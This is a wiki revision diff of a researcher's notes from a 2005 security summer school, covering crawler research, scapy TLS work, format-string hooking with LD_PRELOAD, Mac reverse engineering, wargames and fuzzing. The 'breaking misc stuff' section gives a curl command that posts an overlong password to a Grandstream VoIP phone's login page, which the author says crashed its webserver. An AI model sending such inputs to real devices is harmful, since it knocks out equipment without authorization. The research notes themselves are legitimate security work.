Difference between revisions of "Summerschool Aachen 2005/Notes/Christians notes"

From C4 Wiki
Jump to: navigation, search
Line 31: Line 31:
 
to inspect format strings in closed source software to find possible
 
to inspect format strings in closed source software to find possible
 
format string vulnerabilities.
 
format string vulnerabilities.
 +
The library runs perfectly on Linux with the LD_PRELOAD environment variable,
 +
but it's a little bit bitchy on MacOS X. The linker DOES load
 +
the library (some debugging information can be turned on by setting DYLD_PRINT_LIBRARIES),
 +
but I couldn't convince the linker to overwrite the libc symbol,
 +
inspite using the two variables DYLD_INSERT_LIBRARIES and DYLD_FORCE_FLAT_NAMESPACE.
  
 
= MacOS X reverse engineering =
 
= MacOS X reverse engineering =
Line 38: Line 43:
 
= Gera's challenges =
 
= Gera's challenges =
 
For relaxing, I did some of Gera's challenges, mainly the advanced buffer overflows (especially level 1, 3 and 4).
 
For relaxing, I did some of Gera's challenges, mainly the advanced buffer overflows (especially level 1, 3 and 4).
 +
 +
= AppleScript =
 +
AppleScript is the highly integrated scripting language of the OSA (Open Scripting Architecture) of MacOS X.
 +
The syntax is quite awkward, because you use something like natural language. When writing little helpers
 +
for automated fuzzing of webbrowsers, I tried to get some inspiration from other AppleScripts.
 +
The problem is, that most AppleScript applications are delivered as a program (the bytecoded + an interpreter)
 +
AND with a flag "execute only". That means the source code is not readable.
 +
Some Python scripting and comparing binary files revealed that the copy protection
 +
and the script itself are placed in the so called "Resource Fork" of the binary (the interpreter, as any "normal" file,
 +
is located in the "Data Fork"). The only resource that differs in the protected and unprotected version of the AppleScript
 +
is the "scpt" resource ("SCriPT" - obviously).
  
 
= breaking misc stuff =
 
= breaking misc stuff =
 
The grandstream voip phone's webserver just broke, it seems that the password validation is done in the html form
 
The grandstream voip phone's webserver just broke, it seems that the password validation is done in the html form
 
and the webserver itself is quite naive: curl -d "P2=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" http://172.30.20.71/dologin.htm
 
and the webserver itself is quite naive: curl -d "P2=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" http://172.30.20.71/dologin.htm
 +
 +
= POP3 fuzzing =
 +
I started a POP3 protocol fuzzer in Python. It turns out that a) the clients I tested do not accept random data which does not
 +
look like a POP3 conversation at all and b) the fuzzer also should generate data that looks like real emails.
 +
The fuzzer will be released soon
 +
[[Category:Summerschools]]

Revision as of 21:34, 25 September 2005

My Summerschool Projects

verBOTen.py

I've been running the following test for crawlers for about a year now: I added a "Disallow" entry to my the robots.txt of my webserver and waited for crawlers to explicitly crawl that directory. It seems that there are no crawlers who are interested in files people don't want to be crawled. Together with Maximillian Dornseif, we wrote and set up verBOTen, a crawler that collects robots.txt files from 2.700.000 hostnames that we got from Open Directory Project (http://www.dmoz.org/) and adds them to a database. The next step will be to crawl those files and ask in public to decide the level of interest of the files, similar to the EXIF thumbnail project.

TLS support for scapy

I started to have a look at the very ugly TLS packet format and started to hack a first version of TLS packet generation for scapy. Max improved and bugfixed it, check his documentation for more ;-)

FakeIOI2CMotionSensor

Some time ago, I reverse engineered an application that uses the Apple Motion Sensor, a motion sensor that switches off the harddisk on fast acceleration to prevent damage. While my software runs well on Powerbooks, it refuses to work on the new AMS enabled iBooks. To have a generic way to find out the called driver functions and layout of the used structures, I want to create a replacement for the original driver to interact with the Apple software.

inspectf

Inspired by Max' idea, I started to write a library that replaces printf to inspect format strings in closed source software to find possible format string vulnerabilities. The library runs perfectly on Linux with the LD_PRELOAD environment variable, but it's a little bit bitchy on MacOS X. The linker DOES load the library (some debugging information can be turned on by setting DYLD_PRINT_LIBRARIES), but I couldn't convince the linker to overwrite the libc symbol, inspite using the two variables DYLD_INSERT_LIBRARIES and DYLD_FORCE_FLAT_NAMESPACE.

MacOS X reverse engineering

I had some information exchange with Frederic and together we had a closer look on MacOS X binaries and the linker. More information will follow soon.

Gera's challenges

For relaxing, I did some of Gera's challenges, mainly the advanced buffer overflows (especially level 1, 3 and 4).

AppleScript

AppleScript is the highly integrated scripting language of the OSA (Open Scripting Architecture) of MacOS X. The syntax is quite awkward, because you use something like natural language. When writing little helpers for automated fuzzing of webbrowsers, I tried to get some inspiration from other AppleScripts. The problem is, that most AppleScript applications are delivered as a program (the bytecoded + an interpreter) AND with a flag "execute only". That means the source code is not readable. Some Python scripting and comparing binary files revealed that the copy protection and the script itself are placed in the so called "Resource Fork" of the binary (the interpreter, as any "normal" file, is located in the "Data Fork"). The only resource that differs in the protected and unprotected version of the AppleScript is the "scpt" resource ("SCriPT" - obviously).

breaking misc stuff

The grandstream voip phone's webserver just broke, it seems that the password validation is done in the html form and the webserver itself is quite naive: curl -d "P2=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" http://172.30.20.71/dologin.htm

POP3 fuzzing

I started a POP3 protocol fuzzer in Python. It turns out that a) the clients I tested do not accept random data which does not look like a POP3 conversation at all and b) the fuzzer also should generate data that looks like real emails. The fuzzer will be released soon